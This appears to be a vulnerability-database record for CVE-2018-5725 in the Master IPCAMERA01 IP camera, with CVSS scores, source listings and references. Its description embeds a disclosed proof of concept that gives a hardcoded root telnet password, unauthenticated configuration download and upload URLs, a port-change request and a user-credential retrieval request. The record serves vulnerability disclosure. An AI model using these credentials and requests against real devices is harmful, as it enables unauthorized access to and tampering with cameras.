Sign-up

ID

VAR-201801-1648


CVE

CVE-2018-5725


TITLE

MASTER IPCAMERA01 Device access control vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-001498

DESCRIPTION

MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Change, as demonstrated by the port number of the web server. MASTER IPCAMERA01 The device contains an access control vulnerability.Information may be tampered with. MASTERIPCAMERA01 is an IP network camera product. A configuration error vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. An attacker could exploit this vulnerability to change the configuration. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities # Date: 17-01-2018 # Remote: Yes # Exploit Authors: Daniele Linguaglossa, Raffaele Sabato # Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89 # Vendor: Master IP CAM # Version: 3.3.4.2103 # CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726 I DESCRIPTION ======================================================================== The Master IP CAM 01 suffers of multiple vulnerabilities: # [CVE-2018-5723] Hardcoded Password for Root Account # [CVE-2018-5724] Unauthenticated Configuration Download and Upload # [CVE-2018-5725] Unauthenticated Configuration Change # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure II PROOF OF CONCEPT ======================================================================== ## [CVE-2018-5723] Hardcoded Password for Root Account Is possible to access telnet with the hardcoded credential root:cat1029 ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload Download: http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi Upload Form: ### Unauthenticated Configuration Upload <form name="form6" method="post" enctype="multipart/form-data" action="cgi-bin/hi3510/restore.cgi" > <input type="file" name="setting_file" > <input type="submit" value="restore" > </form> ## [CVE-2018-5725] Unauthenticated Configuration Change Change configuration: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080 List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure Retrieve sensitive information: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser III REFERENCES ======================================================================== http://syrion.me/blog/master-ipcam/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726 http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf

Trust: 2.43

sources: NVD: CVE-2018-5725 // JVNDB: JVNDB-2018-001498 // CNVD: CNVD-2018-02193 // VULHUB: VHN-135757 // VULMON: CVE-2018-5725 // PACKETSTORM: 145935

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-02193

AFFECTED PRODUCTS

vendor:barnimodel:master ip camera01scope:eqversion:3.3.4.2103

Trust: 1.6

vendor:barni carlomodel:master ipcamera01scope:eqversion:3.3.4.2103

Trust: 0.8

vendor:mastermodel:ipcamera01scope:eqversion:3.3.4.2103

Trust: 0.6

sources: CNVD: CNVD-2018-02193 // JVNDB: JVNDB-2018-001498 // CNNVD: CNNVD-201801-570 // NVD: CVE-2018-5725

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-5725
value: HIGH

Trust: 1.0

NVD: CVE-2018-5725
value: HIGH

Trust: 0.8

CNVD: CNVD-2018-02193
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201801-570
value: HIGH

Trust: 0.6

VULHUB: VHN-135757
value: MEDIUM

Trust: 0.1

VULMON: CVE-2018-5725
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-5725
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2018-02193
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-135757
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-5725
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 3.6
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-02193 // VULHUB: VHN-135757 // VULMON: CVE-2018-5725 // JVNDB: JVNDB-2018-001498 // CNNVD: CNNVD-201801-570 // NVD: CVE-2018-5725

PROBLEMTYPE DATA

problemtype:CWE-798

Trust: 1.1

problemtype:CWE-284

Trust: 0.9

sources: VULHUB: VHN-135757 // JVNDB: JVNDB-2018-001498 // NVD: CVE-2018-5725

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201801-570

TYPE

trust management problem

Trust: 0.6

sources: CNNVD: CNNVD-201801-570

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2018-001498

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-135757 // 
            
            
            
            VULMON: CVE-2018-5725

PATCH
title:Top Pageurl:http://www.barni.it/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2018-001498

EXTERNAL IDS
db:NVDid:CVE-2018-5725
Trust: 3.3
db:PACKETSTORMid:145935
Trust: 1.9
db:EXPLOIT-DBid:43693
Trust: 1.8
db:JVNDBid:JVNDB-2018-001498
Trust: 0.8
db:CNNVDid:CNNVD-201801-570
Trust: 0.7
db:CNVDid:CNVD-2018-02193
Trust: 0.6
db:VULHUBid:VHN-135757
Trust: 0.1
db:VULMONid:CVE-2018-5725
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-02193 // 
            
            
            
            VULHUB: VHN-135757 // 
            
            
            
            VULMON: CVE-2018-5725 // 
            
            
            
            JVNDB: JVNDB-2018-001498 // 
            
            
            
            PACKETSTORM: 145935 // 
            
            
            
            CNNVD: CNNVD-201801-570 // 
            
            
            
            NVD: CVE-2018-5725

REFERENCES
url:http://syrion.me/blog/master-ipcam/
Trust: 3.3
url:https://www.exploit-db.com/exploits/43693/
Trust: 1.9
url:https://packetstormsecurity.com/files/145935/master-ip-cam-01-hardcoded-password-unauthenticated-access.html
Trust: 1.8
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5725
Trust: 0.9
url:https://nvd.nist.gov/vuln/detail/cve-2018-5725
Trust: 0.9
url:https://cwe.mitre.org/data/definitions/798.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5726
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5726
Trust: 0.1
url:https://twitter.com/syrion89
Trust: 0.1
url:http://www.themadhermit.net/wp-content/uploads/2013/03/fi9821w-cgi-commands.pdf
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5723
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5724
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5724
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-5723
Trust: 0.1
url:https://twitter.com/dzonerzy,
Trust: 0.1
url:http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-02193 // 
            
            
            
            VULHUB: VHN-135757 // 
            
            
            
            VULMON: CVE-2018-5725 // 
            
            
            
            JVNDB: JVNDB-2018-001498 // 
            
            
            
            PACKETSTORM: 145935 // 
            
            
            
            CNNVD: CNNVD-201801-570 // 
            
            
            
            NVD: CVE-2018-5725

CREDITS
Daniele Linguaglossa, Raffaele Sabato
Trust: 0.1
sources:
            
            
            PACKETSTORM: 145935

SOURCES
db:CNVDid:CNVD-2018-02193
db:VULHUBid:VHN-135757
db:VULMONid:CVE-2018-5725
db:JVNDBid:JVNDB-2018-001498
db:PACKETSTORMid:145935
db:CNNVDid:CNNVD-201801-570
db:NVDid:CVE-2018-5725

LAST UPDATE DATE
2024-11-23T21:53:28.264000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2018-02193date:2018-01-30T00:00:00
db:VULHUBid:VHN-135757date:2019-10-03T00:00:00
db:VULMONid:CVE-2018-5725date:2019-10-03T00:00:00
db:JVNDBid:JVNDB-2018-001498date:2018-02-21T00:00:00
db:CNNVDid:CNNVD-201801-570date:2019-10-23T00:00:00
db:NVDid:CVE-2018-5725date:2024-11-21T04:09:15.260

SOURCES RELEASE DATE
db:CNVDid:CNVD-2018-02193date:2018-01-30T00:00:00
db:VULHUBid:VHN-135757date:2018-01-16T00:00:00
db:VULMONid:CVE-2018-5725date:2018-01-16T00:00:00
db:JVNDBid:JVNDB-2018-001498date:2018-02-21T00:00:00
db:PACKETSTORMid:145935date:2018-01-17T03:33:33
db:CNNVDid:CNNVD-201801-570date:2018-01-17T00:00:00
db:NVDid:CVE-2018-5725date:2018-01-16T22:29:00.397